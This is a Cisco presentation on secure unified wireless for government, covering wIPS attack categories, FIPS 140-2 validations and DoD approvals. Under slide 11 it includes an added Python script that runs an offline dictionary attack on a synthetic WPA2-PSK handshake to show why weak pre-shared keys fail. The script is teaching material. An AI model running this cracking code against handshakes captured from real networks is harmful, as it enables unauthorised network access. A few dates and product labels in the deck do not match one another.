
Cisco Secure Unified Wireless and Mobility Solutions for Government (Ransome 1208)
Dr. Jim Ransome, CISSP, CISM, Senior Director, Secure Unified Wireless and Mobility
© 2006 Cisco Systems, Inc. All rights reserved. Cisco Public.

Slide 1: Cisco Secure Unified Wireless and Mobility Solutions for Government
Dr. Jim Ransome, CISSP, CISM
Senior Director, Secure Unified Wireless and Mobility Solutions
Corporate Security Programs Organization and Global Government Solutions Group

Slide 2: About the Speaker
- 10+ years as a senior corporate executive in information and physical security (CSO and CISO roles)
- 23 years of government service: DOE/LLNL computer scientist and national security analyst, NCIS federal special agent, retired Naval Reserve intelligence officer, former Marine Corps sergeant
- Ph.D. in information systems, specializing in information security; dissertation developed and tested a converged wired-wireless network security model (NSA/DHS Center of Academic Excellence in Information Assurance Education)
- Graduate certificates in international business and international affairs
- Certifications: Certified Information Systems Security Professional (CISSP), Certified Information Security Manager (CISM)
- Adjunct professor for a master's-level information security curriculum
- Publications (Elsevier - Digital Press): Operational Wireless Security, VoIP Security, IM Security, Business Continuity and Disaster Recovery for InfoSec Managers, Wireless Security: Know It All

Slide 3: Agenda
- Can Wireless LANs Really Be Secured?
- Building Secure Unified Wireless and Mobility Government Solutions
- Cisco Wireless / Mobility Security Services

Slide 4: Wireless Enables Mobility

Slide 5: Wireless Enables Mobility (continued)

Slide 6: Is There a Federal Market for Wireless and Mobility?*
Top 10 tech solutions respondents plan to purchase:
- Wireless / Mobility Security
- Data Quality Management
- COOP
- Enterprise Architecture
- IT Consolidation
- Email Management
- Service Oriented Architecture
- Virtualization
- IPv6 Transition
- Legacy Systems Integration
Top 10 tech priorities:
- Data Quality Management
- COOP
- Wireless / Mobility Security
- Email Management
- IT Consolidation
- Enterprise Architecture
- Legacy Systems Integration
- Service Oriented Architecture
- Virtualization
- IPv6 Transition
* Source: 1105 Government Information Group, May 2008, Custom Supplement to Federal Computer Week

Slide 7: Can Wireless LANs Really Be Secured?

Slide 8: Cisco Wired Security Solution Portfolio
Foundation security solutions:
- Firewall: Cisco ASA 5500
- Intrusion prevention: Cisco IPS
- Remote access VPN: Cisco IPS
- Router security: Cisco ISR family
- Switch security: Catalyst engines
- Security systems: NAC / Clean Access
- Security management: Cisco VMS / MARS
- Endpoint security: Cisco Security Agent
- Converged security: Cisco ASA 5500
- Application security: AVS, ACE
Network areas in the diagram: Partner Access, Corporate Network, Internet, Remote Access, Remote/Branch Office, Data Center, Corporate LAN, Web Servers / Web Services, Partner Business Apps, Public IM / Public IPC; protected as Secure WAN, Secure Perimeter, Secure Data Center and Secure LAN.
Advanced security solutions: Day Zero, Application Security, Security Management and Operations, Network Admission Control

Slide 9: Cisco Wireless Security: Collaboration with Cisco Wired Security
Better protection through layered defense and network security collaboration:
- Mitigating malware and client misbehavior: Cisco (wired) IPS
- Enforcing client posture: Cisco NAC
- Controlling client connectivity: Cisco Security Agent, Cisco Secure Services Client
- Unified wired/wireless event and mitigation management: Cisco Security MARS

Slide 10: Cisco Unified Wired-Wireless Security: Stop the Attack Before It Happens
Attack categories in the diagram: on-wire attacks, over-the-air attacks, non-802.11 attacks.
802.11 attacks (detected by Cisco wIPS):
- Denial of service: service disruption
- Ad-hoc wireless bridge: client-to-client backdoor access
- Rogue access points: backdoor network access
- Evil twin / honeypot AP: client connects to the hacker's malicious AP
- Reconnaissance: seeking network vulnerabilities
- Cracking tools: sniffing and eavesdropping
Non-802.11 attacks (detected by Cisco Spectrum Intelligence):
- Bluetooth AP: backdoor access
- Radar, RF jammers, Bluetooth, microwave: service disruption

Slide 11: Cisco Unified Wired-Wireless Security: Stop the Attack Before It Happens (countermeasures)
Same attack diagram as slide 10 (on-wire, over-the-air and non-802.11 attacks; wIPS detects the 802.11 attacks, Spectrum Intelligence the non-802.11 ones), with the countermeasures called out:
- Management Frame Protection (MFP) authenticates 802.11 management frames, so spoofed-management-frame exploits such as man-in-the-middle attacks fail
- WPA2/802.11i (AES-CCMP with 802.1X authentication) defeats eavesdropping and key-cracking attacks
- MFP lets wIPS tell legitimate infrastructure APs from rogues, making rogue detection reliable
- Strong AP device authentication keeps rogue APs off the wire
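The claim that WPA2/802.11i defeats cracking attacks holds for WPA2-Enterprise (802.1X with EAP-TLS, PEAP or EAP-FAST, which yields a fresh per-session master key), but not automatically for the WPA2-PSK option that slide 17 also lists: with a pre-shared key, anyone who captures a single 4-way handshake can test passphrase guesses offline, so the passphrase is the whole defence. The following Python script, an added example written for this page and not Cisco code, shows why. It follows the 802.11i derivation (PBKDF2 for the PMK, PRF-384 for the PTK, HMAC-SHA1-128 for the EAPOL-Key MIC), builds a synthetic handshake message 2 from a constructed SSID, BSSID, client MAC, nonces and wordlist (all made up here), and then runs the offline dictionary check a cracking tool would run against the frame's MIC.

```python
"""Offline dictionary check against a WPA2-PSK 4-way handshake.

Added example for this page (not Cisco code). Every input below (SSID, MACs,
nonces, wordlist) is constructed so the script runs offline; the key
derivation and MIC computation follow IEEE 802.11i (WPA2, AES-CCMP).
"""
import hashlib
import hmac

# Offsets inside an EAPOL-Key frame: 4-byte 802.1X header, then the RSN key
# descriptor (type 1, key info 2, key length 2, replay counter 8, nonce 32,
# IV 16, RSC 8, key ID 8, MIC 16, key data length 2).
NONCE_OFFSET = 17
MIC_OFFSET = 81


def pmk_from_psk(passphrase: str, ssid: str) -> bytes:
    """802.11i: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i), i = 0, 1, ..., then truncate."""
    out = b""
    for i in range((nbytes + 19) // 20):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:nbytes]


def derive_kck(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min(AA,SPA)||max(AA,SPA)||min(nonces)||max(nonces)).
    The key confirmation key (KCK) is its first 128 bits and is what authenticates the handshake."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)[:16]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (AES-CCMP): HMAC-SHA1 over the frame with the MIC field zeroed, truncated to 128 bits."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, kck: bytes) -> bytes:
    """Construct handshake message 2 (supplicant -> AP): carries SNonce and a MIC keyed with the KCK."""
    frame = bytes([1, 3]) + (95).to_bytes(2, "big")      # EAPOL v1, type EAPOL-Key, body length
    frame += bytes([2])                                  # descriptor type 2 = RSN
    frame += (0x010A).to_bytes(2, "big")                 # key info: version 2, pairwise, MIC present
    frame += (16).to_bytes(2, "big")                     # key length: CCMP TK is 16 bytes
    frame += (1).to_bytes(8, "big")                      # replay counter
    frame += snonce                                      # 32-byte SNonce
    frame += b"\x00" * 32                                # key IV, key RSC, key ID (unused in msg 2)
    frame += b"\x00" * 16 + (0).to_bytes(2, "big")       # MIC placeholder, key data length 0
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack_psk(ssid, aa, spa, anonce, msg2, wordlist):
    """What a cracking tool does with a captured handshake: recompute the MIC for each guess."""
    snonce = msg2[NONCE_OFFSET:NONCE_OFFSET + 32]
    target = msg2[MIC_OFFSET:MIC_OFFSET + 16]
    for guess in wordlist:
        kck = derive_kck(pmk_from_psk(guess, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, msg2), target):
            return guess
    return None


def constructed_capture(passphrase: str, ssid: str):
    """Stand-in for a sniffed handshake: constructed BSSID, client MAC and nonces."""
    aa = bytes.fromhex("001122334455")       # constructed AP BSSID
    spa = bytes.fromhex("66778899aabb")      # constructed client MAC
    anonce = bytes(range(32))                # constructed ANonce
    snonce = bytes(range(32, 64))            # constructed SNonce
    kck = derive_kck(pmk_from_psk(passphrase, ssid), aa, spa, anonce, snonce)
    return aa, spa, anonce, build_msg2(snonce, kck)


WORDLIST = ["password", "letmein1", "welcome1", "cisco123", "Summer2008!"]  # constructed


def demo(ssid: str = "GovNet"):
    """Returns (recovered weak PSK, result for a strong PSK); the strong one is not recovered."""
    aa, spa, anonce, msg2 = constructed_capture("cisco123", ssid)
    weak = crack_psk(ssid, aa, spa, anonce, msg2, WORDLIST)
    aa, spa, anonce, msg2 = constructed_capture("qT7#vL9m!Rz2@pX4wK8s", ssid)
    strong = crack_psk(ssid, aa, spa, anonce, msg2, WORDLIST)
    return weak, strong


if __name__ == "__main__":
    print(demo())
```

Running `demo()` recovers `cisco123` from the constructed handshake after a handful of PBKDF2 evaluations and returns `None` for the random 20-character passphrase; a real tool simply runs the same loop over millions of guesses on a GPU. The practical reading for the government deployments this deck targets: use the 802.1X/EAP modes (EAP-TLS, PEAP, EAP-FAST) that the FIPS client and ACS support, and treat WPA2-PSK as acceptable only with a long random key that cannot appear in any wordlist.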

Slide 12: Building on 802.11i: Cisco's Unified Wireless Security Approach to End-to-End Security
Diagram components: NAC Appliance, L2 IDS, L3-7 IDS, RF containment of an 802.11a rogue AP and an 802.11a rogue client.
- Fine-grained mapping and authentication: location services enable precise mapping of clients and threats, allowing fine-grained authentication and quick removal
- Wired IDS integration: unified wired and wireless IDS ensures malicious wireless clients are disconnected from the network
- Wireless endpoint compliance: NAC prevents wireless endpoints from introducing viruses, spyware, malware, etc.
- Wireless IDS/IPS: comprehensive wireless threat identification and over-the-air prevention
- Offsite endpoint protection: IPS detects and prevents offsite wireless threats such as ad hoc networks

Slide 13: Building on 802.11i: Other Key Elements of a Unified Wireless Security Solution
Diagram: enterprise users, guest users and contractors on campus, a rogue AP on campus, a switch-to-switch guest tunnel from the campus to a guest controller in the DMZ, and the enterprise network.
- Network segmentation: key to providing guest access by controlling and prioritizing access to business resources
- Wireless network location services: quick location of rogue access points and other wireless threats
- Guest services: path isolation; guest traffic never mixes with enterprise traffic
- Wireless security policy: wireless client connection policy enforcement

Slide 14: Building on 802.11i: Real-time RF Management and Integrated Spectrum Intelligence
Detect, classify, and locate RF interference (case studies; a phased approach).

Slide 15: Cisco Unified Wired-Wireless Security Summary: Comprehensive Layer 1-7 Protection and Prevention
- Layer 1, RF airspace protection: RF spectrum analysis; non-802.11 devices
- Layer 2, wireless intrusion prevention: rogue detection/containment; wireless hacking / network and signature intrusion detection
- Layers 2-7, wired-side security collaboration: inappropriate client activity; malware detection / mitigation; admission control
- Hardened network foundation (proactive prevention): infrastructure authentication; Management Frame Protection; automated vulnerability analysis

Slide 16: Cisco Wireless Federal Solution
- Cisco 2710 Wireless Location Appliance
- Cisco Wireless Control System (WCS): centralized WLAN management
- Cisco Aironet FIPS 140-2 APs
- Cisco Secure ACS: FIPS 140-2 AAA RADIUS
- Cisco WLAN FIPS 140-2 controllers
- WIDS
FIPS and Common Criteria certified; Type-1 certified

Slide 17: FIPS 140-2 Certified End-to-End
Unified wired and wireless network supporting mobile applications, device access control and visibility, spectrum intelligence, guest access, and mobility services (location, security, voice service and performance).
FIPS WLCs:
- 4402 (12, 25 and 50 APs)
- 4404 (100 APs)
- WiSM (300 APs)
- 3750G (25 and 50 APs)
FIPS APs: 1242, 1131, 1310, 1232/1231
In FIPS process: 1142 (802.11n), 1252 (802.11n), 1522 (mesh)
FIPS client: Cisco Secure Services Client (CSSC); WPA2 / 802.11i; EAP-FAST, EAP-TLS, PEAP, WPA2-PSK
FIPS ACS: Cisco Access Control Server; WPA2 / 802.11i; EAP-FAST, EAP-TLS, PEAP, WPA2-PSK

Slide 18: More Than 20 Wireless Product FIPS 140-2 Validations
- FIPS certificate #693: Cisco WLAN Controllers 4402-12, 4402-25, 4402-50 and 4404-100
- FIPS certificate #695: Cisco Aironet (LWAPP) LAP1242, LAP1131, LAP1232, LAP1231
- FIPS certificate #701: Cisco Aironet (IOS) AP1242, AP1131, AP1232 and BR1310
- FIPS certificate #729: Cisco WiSM with Catalyst 6506, 6506-E, 6509, 6509-E switches
- FIPS certificate #948: Cisco Secure ACS FIPS module
- FIPS certificate #955: Cisco WLAN Controllers 4402-12, 4402-25, 4402-50 and 4404-100
- FIPS certificate #957: Cisco WiSM with Catalyst 6506, 6506-E, 6509, 6509-E switches
- FIPS certificate #958: Cisco Catalyst 3750G-25/50 WLAN Controller
- FIPS certificate #913: Cisco Aironet (LWAPP) LAP1242, LAP1131
- FIPS certificate #1016: Cisco Secure SSC FIPS module
In process: Cisco Unified Wireless 5.2 FIPS release, adding 15 more devices

Slide 19: Cisco Wireless DoD Approvals and Certifications
- Common Criteria: 10 wireless products in process, submitted through a DoD-approved NIAP lab for conformance to the DoD WLAN Protection Profile
- U.S. Army IAAPL: 5 products approved today; 10 more submitted in 2009
- U.S. Navy NMCI ATO: Cisco Wireless 802.11i end-to-end solution approved (FIPS client, APs, controllers, ACS, location, etc.)
- DoD 8100.2 WLAN policy compliance: https://acc.dau.mil/CommunityBrowser.aspx?id=153484&lang=en-US
- DISA Wireless STIG compliance: http://iase.disa.mil/stigs/stig/wireless_stig_v5r2.pdf

Slide 20: End-to-End Wireless Security: Type 1 Architecture for Wireless and Mobile Networks
DoD compliant and FIPS validated:
- APs authenticate into the DoD network with X.509 certificates as Common Criteria trusted network devices
- Controller and APs establish a FIPS 140-2 validated assured control channel
- APs enforce 802.1X port access control and terminate FIPS 140-2 encryption/decryption services at the edge of the DoD security border
- The controller centrally manages the 802.1X state machine, providing secure mobility

Slide 21: Building Secure Unified Wireless and Mobility Government Solutions

Slide 22: Challenges of a Secure and Interoperable Unified Communications Infrastructure

